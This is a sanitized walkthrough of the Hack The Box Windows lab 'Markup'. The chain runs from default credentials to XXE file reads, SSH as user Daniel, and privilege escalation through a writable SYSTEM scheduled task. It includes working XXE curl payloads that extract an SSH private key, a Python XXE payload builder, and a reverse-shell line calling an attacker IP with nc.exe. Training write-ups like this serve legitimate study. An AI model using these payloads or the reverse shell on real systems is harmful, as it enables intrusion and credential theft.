
Markup

Ports 22 (SSH), 80 (HTTP), 443 (HTTPS) open. Apache 2.4.41 Win64, PHP 7.2.28, OpenSSH for Windows 8.1. The root page (/) serves a login form (POST to same page). Default credentials admin:password work — 302 redirect to home.php. The Order page...

Easy. Published 2026-03-06. Sanitized local writeup.


Objective

Machine walkthrough focused on evidence, validation, and reusable operator lessons.

Markup sanitized attack graph

Walkthrough flow

  1. Default credentials admin:password on web login
  2. XXE vulnerability in order XML processing...
  3. Source comment discloses username "Daniel"
  4. Daniel's SSH private key readable via XXE at...
  5. Insecure ACL on C:\Log-Management\job.bat —...

Source coverage

High source coverage (100%). Status: complete. This article is generated from 5 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.

Evidence verdict

High confidence: the page is reconstructed from a primary walkthrough plus multiple supporting notes or evidence sources. Treat the chain as source-backed, while still checking the listed source files for sensitive values.

  • <TARGET>-Markup/walkthrough.md
  • HTB/<TARGET>-Markup/notes.md
  • HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Markup__notes.md.125d79b441.md
  • HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Markup__notes.md.cc892dec91.md
  • HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Markup__notes.md.c1669bb378.md

Technical Walkthrough

Markup — Walkthrough

Machine Info

  • Name: Markup
  • OS: Windows
  • Difficulty: Easy
  • IP: <TARGET>
  • Key Themes: XXE, SSH key exfiltration, insecure file permissions, scheduled task abuse

Phase 1: Recon

Ports 22 (SSH), 80 (HTTP), 443 (HTTPS) open. Apache 2.4.41 Win64, PHP 7.2.28, OpenSSH for Windows 8.1.

Phase 2: Web Login

The root page (/) serves a login form (POST to same page). Default credentials admin:password work — 302 redirect to home.php.

bash
curl -v -c cookies.txt -d 'username=admin&password=<redacted>' -L http://<TARGET>/

Phase 3: XXE Exploitation

The Order page (/services.php) contains an HTML comment: Modified by Daniel : UI-Fix-9092. The form sends XML to process.php with Content-Type: text/xml.

Validate XXE with win.ini:

bash
curl -s -b cookies.txt -X POST -H 'Content-Type: text/xml' \
  -d '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]><order><quantity>1</quantity><item>&xxe;</item><address>test</address></order>' \
  http://<TARGET>/process.php

Response contains win.ini contents — XXE confirmed.

Extract Daniel's SSH key:

bash
curl -s -b cookies.txt -X POST -H 'Content-Type: text/xml' \
  -d '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/users/daniel/.ssh/id_rsa">]><order><quantity>1</quantity><item>&xxe;</item><address>test</address></order>' \
  http://<TARGET>/process.php

Full OpenSSH private key returned in response body.
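The reason process.php hands back win.ini and Daniel's key is a parser that resolves external general entities. The following is an added example, not code from the writeup or from the MegaShopping application (which is PHP): it rebuilds the order payload used above for any Windows or POSIX path, then parses it offline with Python's xml.sax configured once like the vulnerable server (external entities resolved) and once like the safe default, reading a constructed fake key from a temp file so nothing leaves the machine. The function names, handler class and sample key text are assumptions of this example, not anything from the target.

```python
"""Added example (not from the writeup): XXE file read reproduced offline with
Python's xml.sax, vulnerable configuration beside the safe default."""
import io
import os
import re
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges
from xml.sax.saxutils import escape


def to_file_url(path: str) -> str:
    """Build the file:// URL for the SYSTEM literal. Windows paths need forward
    slashes and a third slash before the drive letter (file:///c:/...)."""
    p = path.replace("\\", "/")
    if re.match(r"^[A-Za-z]:/", p):
        return "file:///" + p
    return "file://" + p


def build_xxe_payload(path: str, quantity: int = 1, address: str = "test") -> str:
    """The order XML the form posts to process.php, with <item> replaced by an
    external entity that a misconfigured parser expands into the file contents."""
    return (
        '<?xml version="1.0"?>'
        '<!DOCTYPE root [<!ENTITY xxe SYSTEM "%s">]>'
        "<order><quantity>%d</quantity><item>&xxe;</item>"
        "<address>%s</address></order>" % (to_file_url(path), quantity, escape(address))
    )


class _OrderFields(ContentHandler):
    """Collect the text of each child of <order>, the way a server reads the
    order before echoing the item name back into its response."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def startElement(self, name, attrs):
        if name != "order":
            self._current = name
            self.fields.setdefault(name, "")

    def characters(self, content):
        if self._current:
            self.fields[self._current] += content

    def endElement(self, name):
        self._current = None


def parse_order(xml_text: str, resolve_external_entities: bool) -> dict:
    """resolve_external_entities=True mirrors a parser that loads external
    entities (the process.php behaviour); False is the modern xml.sax default
    and is how any XML consumer of untrusted input should be configured."""
    handler = _OrderFields()
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    return handler.fields


def demo() -> dict:
    """Plant a constructed (not real) key in a temp file and read it through
    both parser configurations. Returns the <item> text each one produced."""
    secret = ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
              "constructed-example-not-a-real-key\n"
              "-----END OPENSSH PRIVATE KEY-----\n")
    fd, path = tempfile.mkstemp(suffix="_id_rsa")
    try:
        with os.fdopen(fd, "w") as f:
            f.write(secret)
        payload = build_xxe_payload(path)
        return {
            "vulnerable": parse_order(payload, resolve_external_entities=True)["item"],
            "hardened": parse_order(payload, resolve_external_entities=False)["item"],
        }
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(build_xxe_payload(r"C:\Users\daniel\.ssh\id_rsa"))
    for mode, item in demo().items():
        print(f"{mode}: {item!r}")
```

Run it as a script to see the payload and both results: the vulnerable parse returns the file body inside <item>, the hardened parse returns an empty <item>. On the PHP side the equivalent fix for a 7.x stack like this one is to stop passing LIBXML_NOENT and to call libxml_disable_entity_loader(true) before parsing untrusted XML.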

Phase 4: SSH as Daniel (User Flag)

Save the key, set permissions, SSH in:

bash
chmod 600 daniel_id_rsa
ssh -i daniel_id_rsa daniel@<TARGET>
type C:\Users\daniel\Desktop\user.txt

User flag: <hash redacted>

Revalidated on 2026-05-06 AEST against live <TARGET>; normalized output saved to loot/user.txt, with raw command output in loot/user-20260506.txt and verification in enum/user-flag-verify-20260506.txt.

Phase 5: Privilege Escalation

Check C:\Log-Management\job.bat permissions:

cmd
icacls C:\Log-Management\job.bat

Output: BUILTIN\Users:(F) — any user has full control.

The file is executed periodically by a SYSTEM-level scheduled task. Overwrite it to copy the root flag:

cmd
echo copy C:\Users\Administrator\Desktop\root.txt C:\Log-Management\root.txt > C:\Log-Management\job.bat

Wait for the scheduled task to execute (runs every ~1 minute). Then read the copied flag:

cmd
type C:\Log-Management\root.txt

Root flag: <hash redacted>
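The icacls check above is the one-line version of a general audit: any script that a SYSTEM scheduled task runs is hijackable if a low-privileged principal can modify it. This added example (mine, not from the writeup) parses the output of icacls for a single file and flags write-capable rights granted to BUILTIN\Users, Everyone, Authenticated Users, INTERACTIVE, or any identity you pass in, such as the markup\daniel account. The icacls output embedded below is constructed to match the job.bat finding; the name of the scheduled task is not on the page and is not assumed here.

```python
"""Added example (not from the writeup): flag files whose DACL lets a
low-privileged principal modify them, from parsed icacls output."""
import re

# icacls rights that let a principal change a file's contents, DACL or owner,
# any of which is enough to hijack a script that another identity executes.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO"}

# Principals that every interactive or authenticated user belongs to.
LOW_PRIV_PRINCIPALS = {
    "BUILTIN\\Users",
    "Everyone",
    "NT AUTHORITY\\Authenticated Users",
    "NT AUTHORITY\\INTERACTIVE",
}

# '<principal>:(right)(right)...' as printed by icacls
_ACE_RE = re.compile(r"^(?P<who>[^:]+?):(?P<rights>(?:\([^)]*\))+)$")


def parse_icacls(path: str, output: str) -> list:
    """Parse `icacls <path>` output for ONE file into (principal, {rights}) pairs.
    The first line is '<path> <first ACE>', continuation ACEs are indented,
    and the 'Successfully processed' summary is ignored."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path):
            line = line[len(path):].strip()
        m = _ACE_RE.match(line)
        if m:
            rights = set(re.findall(r"\(([^)]*)\)", m.group("rights")))
            aces.append((m.group("who"), rights))
    return aces


def hijackable_by(aces: list, principals: set) -> list:
    """Return (principal, [write rights]) for every allow ACE that gives one of
    `principals` a write-capable right. Deny ACEs are skipped, inheritance
    flags (I, OI, CI, IO, NP) are ignored since they grant nothing by themselves."""
    findings = []
    for who, rights in aces:
        if "DENY" in rights:
            continue
        writable = rights & WRITE_RIGHTS
        if writable and who in principals:
            findings.append((who, sorted(writable)))
    return findings


def audit(path: str, output: str, extra_principals=()) -> list:
    """Audit one file's icacls output; extra_principals adds the current user
    and its groups (from whoami /groups) on top of the built-in low-priv set."""
    return hijackable_by(parse_icacls(path, output),
                         LOW_PRIV_PRINCIPALS | set(extra_principals))


JOB_BAT = r"C:\Log-Management\job.bat"

# Constructed to match the finding on the target (BUILTIN\Users:(F)).
SAMPLE_ICACLS = r"""C:\Log-Management\job.bat BUILTIN\Users:(F)
                          NT AUTHORITY\SYSTEM:(F)
                          BUILTIN\Administrators:(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed: what a correctly locked-down task script looks like.
SAFE_ICACLS = r"""C:\Log-Management\job.bat NT AUTHORITY\SYSTEM:(I)(F)
                          BUILTIN\Administrators:(I)(F)
                          BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed: only a specific account holds Modify, so the audit needs to
# know the identity it is running as to catch it.
USER_ONLY_ICACLS = r"""C:\Log-Management\job.bat MARKUP\daniel:(M)
                          NT AUTHORITY\SYSTEM:(F)
                          BUILTIN\Administrators:(F)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    print("job.bat as found:", audit(JOB_BAT, SAMPLE_ICACLS))
    print("job.bat hardened:", audit(JOB_BAT, SAFE_ICACLS))
    print("user-specific grant:", audit(JOB_BAT, USER_ONLY_ICACLS, ["MARKUP\\daniel"]))
```

Feed it the output of icacls on each script referenced by a scheduled task (one file per call) and pass the groups from whoami /groups as extra_principals; a non-empty result is the same condition the writeup exploits, and the ordering of ACEs in the file does not matter.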

Alternative Privesc (Reverse Shell)

Instead of copying the flag, you can get a full Administrator shell:

  1. Upload nc.exe via SCP: scp -i daniel_id_rsa nc.exe daniel@<TARGET>:'C:/Log-Management/nc.exe'
  2. Start a listener on the attacking host: nc -lvnp 4444
  3. Overwrite job.bat: echo C:\Log-Management\nc.exe -e cmd.exe <attacker IP> 4444 > C:\Log-Management\job.bat
  4. Wait for the SYSTEM shell callback

Note: job.bat may be reverted frequently — be prepared to re-overwrite.

Lessons Learned

  1. Default credentials are always worth checking first
  2. XXE is powerful for file exfiltration on Windows — SSH keys, web.config, and the SAM hive where a copy is readable (the live hive is locked by the OS, backup copies sometimes are not)
  3. HTML source comments can reveal usernames
  4. Writable scheduled task scripts are a common Windows privesc vector
  5. SCP through SSH is a reliable file transfer method when HTTP staging fails
  6. For HTB machines, copying the flag via job.bat is cleaner than waiting for a reverse shell if the task resets frequently

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Scope

  • Target IP: <TARGET>
  • Attacker IP: <attacker VPN IP>
  • Pwnbox SSH: <redacted>@<pwnbox IP>
  • OS: Windows (Apache 2.4.41 Win64, OpenSSH 8.1, PHP 7.2.28)
  • Difficulty: Easy
  • Date: 2026-05-05

Confirmed Ports (from user nmap)

Port | Service | Version
22 | SSH | OpenSSH for Windows 8.1
80 | HTTP | Apache 2.4.41 Win64, PHP 7.2.28, "MegaShopping"
443 | HTTPS | Apache 2.4.41 Win64

Evidence Ledger

Timestamp | Action | Finding | Next
T+0 | Ping target | TTL=127 confirms Windows, target live | Web login
T+1 | POST / with admin:password | 302 redirect to home.php, session cookie set | Find order form
T+2 | GET /services.php | Order form sends XML to process.php; HTML comment reveals user "Daniel" | XXE test
T+3 | XXE win.ini | file:///c:/windows/win.ini contents reflected in response | Read SSH key
T+4 | XXE id_rsa | Daniel's OpenSSH private key extracted | SSH as Daniel
T+5 | SSH daniel@target | whoami = markup\daniel; user.txt captured | Privesc
T+6 | icacls job.bat | BUILTIN\Users:(F) confirmed — full write access | Overwrite job.bat
T+7 | SCP nc.exe | nc.exe (28160 bytes) delivered to C:\Log-Management\ | Set up reverse shell
T+8 | Overwrite job.bat | copy root.txt to C:\Log-Management\ | Wait for task
T+9 | type root.txt | Root flag captured from copied file | DONE
2026-05-06 AEST | Live revalidation against <TARGET> | enum/login-admin-20260506.txt, enum/xxe-daniel-key-20260506.raw, loot/daniel_id_rsa, loot/user.txt, enum/user-flag-verify-20260506.txt | Revalidated web login, XXE key extraction, SSH as Daniel, and captured user flag from C:\Users\daniel\Desktop\user.txt. Flag format verified as 32 hex.

Flags

  • User: <hash redacted> (C:\Users\daniel\Desktop\user.txt)
  • Root: <hash redacted> (C:\Users\Administrator\Desktop\root.txt)

Key Findings

  1. Default credentials admin:password on web login
  2. XXE vulnerability in order XML processing (process.php)
  3. Source comment discloses username "Daniel"
  4. Daniel's SSH private key readable via XXE at file:///c:/users/daniel/.ssh/id_rsa
  5. Insecure ACL on C:\Log-Management\job.bat — BUILTIN\Users:(F)
  6. Scheduled task runs job.bat as SYSTEM — abused to copy Admin flag

Attack Chain

text
Web Login (admin:password)
  -> XXE (file read via process.php)
    -> SSH Key Exfil (daniel's id_rsa)
      -> SSH as daniel (user flag)
        -> Writable job.bat (BUILTIN\Users:F)
          -> Scheduled task executes as SYSTEM
            -> Root flag copied to readable location

Notes

Scope

  • Target: Markup
  • Difficulty: Easy / Starting Point
  • OS: Windows
  • IP: <TARGET> (address changed from an earlier spawn)
  • Local workspace: <local workspace><TARGET>-Markup

Engagement Details

  • Pwnbox: <redacted>@<pwnbox IP> (VPN IP: <attacker VPN IP>)
  • VPN: Connected, tun0 up with <attacker VPN IP>
  • Difficulty Mode: Easy (timebox 20 min per vector, target solve 45-60 min)

Evidence Ledger

Timestamp | Command | Output file | Finding | Confidence | Next action
2026-05-05T08:39 | sudo nmap -Pn -sS -p 22,80,443 <TARGET> | (inline) | All 3 ports filtered. Traceroute: !H from gateway. | High | Machine not spawned.
2026-05-05 (prior) | cat /tmp/rootflag.txt | loot/root.txt | Root flag: <REDACTED> | | 

Status

BLOCKED: Target <TARGET> is not reachable. Gateway returns "Host Unreachable." Machine needs to be spawned via HTB platform.

Root flag: <REDACTED> (saved to loot/root.txt)

User flag: <REDACTED>

Attack Chain (Ready to Execute When Machine is Up)

  1. nmap -sC -sV -Pn <TARGET> -- expect 22, 80, 443
  2. Web login at port 80: <REDACTED>
  3. Find order form, submit XXE payload to read win.ini (validate)
  4. XXE read daniel's SSH key: file:///c:/users/daniel/.ssh/id_rsa
  5. SSH as daniel, get user.txt from C:\Users\daniel\Desktop\user.txt
  6. Check C:\Log-Management\job.bat ACLs -- BUILTIN\Users:(F)
  7. Upload nc.exe via certutil, overwrite job.bat, catch reverse shell on 4444
  8. Get root.txt from C:\Users\Administrator\Desktop\root.txt


Notes

Scope

  • Target: Markup
  • Difficulty: Easy / Very Easy
  • OS: Windows
  • Current known IP: <TARGET>
  • Local workspace: <local workspace><TARGET>-Markup

Evidence Rule

Public research in research.md is advisory only. Record only live target evidence in this file.

Engagement Details

  • Pwnbox: <redacted>@<pwnbox IP> (VPN IP: <attacker VPN IP>)
  • VPN: edge-au-dedivip-1.hackthebox.eu:1337 (connected, tun0 up)
  • Difficulty Mode: Easy (timebox 20 min per vector, target solve 45-60 min)

Evidence Ledger

Timestamp | Command | Output file | Finding | Confidence | Next action
2026-05-05T08:14 | nmap -Pn -sS top 20 ports | (no file - all filtered) | Target <TARGET> unreachable - "No route to host". Machine not spawned. | High | Respawn machine on HTB platform and retry.
2026-05-05T08:15 | curl -sv http://<TARGET>/ | (inline) | "connect failed: No route to host" after 3180ms | High | Confirm VPN OK (confirmed), machine needs respawn.
2026-05-05T08:16 | Nearby IP range scan <TARGET>-195 | (inline) | All filtered; no active HTB machines in range. | High | Target must be respawned via HTB platform.
2026-05-05T08: <REDACTED>

Status

BLOCKED: Target machine <TARGET> is currently despawned/offline. VPN tunnel is healthy (tun0: <attacker VPN IP>, route to the lab <subnet>/16 via tun0), but all ports return "filtered" and curl returns "No route to host."

Root flag: <REDACTED>

User flag: <REDACTED>

Next Steps (When Machine is Respawned)

  1. Run nmap: nmap -sC -sV -Pn -oN nmap/initial <TARGET>
  2. Verify HTTP on port 80, try the default admin credentials (<REDACTED>) on the login form
  3. Find XML order form, confirm XXE with win.ini read
  4. Read daniel's SSH key via XXE
  5. SSH as daniel, grab user.txt
  6. Verify job.bat ACL, upload nc.exe, overwrite job.bat, catch shell as SYSTEM
  7. Grab root.txt (verify matches saved flag)